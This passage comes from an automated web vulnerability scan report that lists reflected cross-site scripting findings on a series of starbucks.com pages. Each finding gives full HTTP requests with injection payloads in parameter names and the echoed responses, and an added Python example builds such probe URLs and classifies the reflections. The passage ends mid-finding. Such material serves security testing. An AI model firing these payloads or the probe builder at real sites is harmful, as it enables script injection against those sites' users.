2.51. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e440"style%3d"x%3aexpression(alert(1))"503f9615132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e440"style="x:expression(alert(1))"503f9615132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style%3d"x%3aexpression(alert(1))"503f9615132=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:11 GMT
Connection: close
Content-Length: 43839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style="x:expression(alert(1))"503f9615132=1" />
...[SNIP]...

2.52. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47d4a"%3balert(1)//629b8d5aeec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47d4a";alert(1)//629b8d5aeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?47d4a"%3balert(1)//629b8d5aeec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:17 GMT
Connection: close
Content-Length: 43744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
= {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643064966001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?47d4a";alert(1)//629b8d5aeec=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.53. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca7e4"style="x:expression(alert(1))"acb65ae86d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:20 GMT
Connection: close
Content-Length: 40353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style="x:expression(alert(1))"acb65ae86d6=1"/>
...[SNIP]...

2.54. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a6b9"style="x:expression(alert(1))"d5a41dc5583 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:22 GMT
Connection: close
Content-Length: 40708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style="x:expression(alert(1))"d5a41dc5583=1"/>
...[SNIP]...

2.55. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eff70"style="x:expression(alert(1))"6f0990795c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/latin-america?eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:01 GMT
Connection: close
Content-Length: 46735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?eff70"style="x:expression(alert(1))"6f0990795c7=1" />
...[SNIP]...

2.56. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edbf"%3balert(1)//c0d90c55a41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9edbf";alert(1)//c0d90c55a41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/latin-america?9edbf"%3balert(1)//c0d90c55a41=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:14 GMT
Connection: close
Content-Length: 46640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101031001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9edbf";alert(1)//c0d90c55a41=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.57. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4325"style="x:expression(alert(1))"db73de7f50b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:36 GMT
Connection: close
Content-Length: 42978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?f4325"style="x:expression(alert(1))"db73de7f50b=1" />
...[SNIP]...

2.58. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3a82"%3balert(1)//5ab9813aafa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3a82";alert(1)//5ab9813aafa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?d3a82"%3balert(1)//5ab9813aafa=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:39 GMT
Connection: close
Content-Length: 42883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
vars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101033001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?d3a82";alert(1)//5ab9813aafa=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.59. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 124ea"%3balert(1)//bd639cab20c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 124ea";alert(1)//bd639cab20c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse?124ea"%3balert(1)//bd639cab20c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:59 GMT
Connection: close
Content-Length: 52656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
"text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759747001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse?124ea";alert(1)//bd639cab20c=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.60. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3df34"style="x:expression(alert(1))"fb0a4a5b623 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse?3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:56 GMT
Connection: close
Content-Length: 52751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse?3df34"style="x:expression(alert(1))"fb0a4a5b623=1" />
...[SNIP]...

2.61. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fa72"style="x:expression(alert(1))"5a47d7b77de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community?9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:38 GMT
Connection: close
Content-Length: 41639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community?9fa72"style="x:expression(alert(1))"5a47d7b77de=1" />
...[SNIP]...

2.62. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49dde"style="x:expression(alert(1))"e7346a933d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community/mystarbucksidea?49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:15 GMT
Connection: close
Content-Length: 41683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?49dde"style="x:expression(alert(1))"e7346a933d9=1"/>
...[SNIP]...
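
The probe the report applies to every page above can be reproduced offline. The following is an added example and not code from the report or from the scanner that produced it: it builds the request target in the same form as the requests shown (payload carried in a parameter name, with `=`, `:` and `;` percent-encoded), then locates the canary-delimited echo in a response body and decides whether the quote survived inside a double-quoted attribute or a JavaScript string. The response fragments are constructed fixtures modelled on the evidence lines for 2.62 and 2.64; the function names are the example's own.

```python
"""Reproduce the report's reflection probe offline.

Added example, not the report's or the scanner's own code. The scanner carries its
payload in the *name* of a query parameter because the page copies the decoded
request URL into an og:url meta attribute and into a JavaScript string. The
response fragments below are constructed fixtures modelled on the evidence lines
in this report; nothing is fetched from the network.
"""
import re
import secrets
from typing import Optional

# Payload shapes used in the report: break out of a double-quoted attribute with an
# IE-only style expression, or terminate a double-quoted JavaScript string.
PAYLOADS = {
    "attr": '{p}"style="x:expression(alert(1))"{s}',
    "js": '{p}";alert(1)//{s}',
}


def new_canaries():
    """Random prefix/suffix so the echo can be located unambiguously
    (5 and 11 hex characters, the lengths used in the report)."""
    return secrets.token_hex(3)[:5], secrets.token_hex(6)[:11]


def build_probe(path: str, prefix: str, suffix: str, kind: str):
    """Return (request_target, raw_payload). '=', ':' and ';' are percent-encoded so
    the whole payload survives query parsing as one parameter name; the quotes go raw."""
    raw = PAYLOADS[kind].format(p=prefix, s=suffix)
    encoded = raw.replace("=", "%3d").replace(":", "%3a").replace(";", "%3b")
    return f"{path}?{encoded}=1", raw


def classify_reflection(body: str, prefix: str, suffix: str) -> Optional[dict]:
    """Find the canary-delimited echo and decide whether the quote survived in a
    context where it matters. Returns None when the payload is not reflected at all."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if m is None:
        return None
    before, echoed = body[: m.start()], m.group(1)
    if before.rfind("<script") > before.rfind("</script>"):
        context = "js_string"
        # an unescaped double quote ends the string literal
        breaks_out = re.search(r'(?<!\\)"', echoed) is not None
    elif before.rfind("<") > before.rfind(">"):
        tag_so_far = before[before.rfind("<"):]
        # an odd number of quotes means we are inside a double-quoted attribute value
        context = "html_attribute_dq" if tag_so_far.count('"') % 2 else "html_tag"
        breaks_out = '"' in echoed
    else:
        context = "html_text"
        breaks_out = "<" in echoed
    return {"context": context, "echoed": echoed, "breaks_out": breaks_out}


# Constructed fixtures reproducing the evidence lines of 2.62 and 2.64, plus the
# same lines as they would look with correct encoding applied.
ATTR_REFLECTED = (
    "<html><head>\n"
    '<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?'
    '49dde"style="x:expression(alert(1))"e7346a933d9=1"/>\n'
    "</head></html>"
)
ATTR_ENCODED = ATTR_REFLECTED.replace(
    '"style="x:expression(alert(1))"', "&quot;style=&quot;x:expression(alert(1))&quot;"
)
JS_REFLECTED = (
    '<html><head><script type="text/javascript">\n'
    "   var flashvars = {};\n"
    '   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse/entertainment?'
    '90a4e";alert(1)//d2bb761e82e=1";\n'
    "</script></head></html>"
)
JS_ESCAPED = JS_REFLECTED.replace('";alert', '\\";alert')


if __name__ == "__main__":
    print(build_probe("/coffeehouse/entertainment", *new_canaries(), "attr")[0])
    for name, body, p, s in [
        ("2.62 attribute", ATTR_REFLECTED, "49dde", "e7346a933d9"),
        ("2.62 encoded", ATTR_ENCODED, "49dde", "e7346a933d9"),
        ("2.64 js string", JS_REFLECTED, "90a4e", "d2bb761e82e"),
        ("2.64 escaped", JS_ESCAPED, "90a4e", "d2bb761e82e"),
    ]:
        print(name, classify_reflection(body, p, s))
```

Running the module prints one classification per fixture. The context test is deliberately crude (it only looks back for the nearest unclosed `<script` or `<`), which is enough for the two sinks this report shows; for anything more involved, locate the echo with a real HTML parser.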

2.63. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

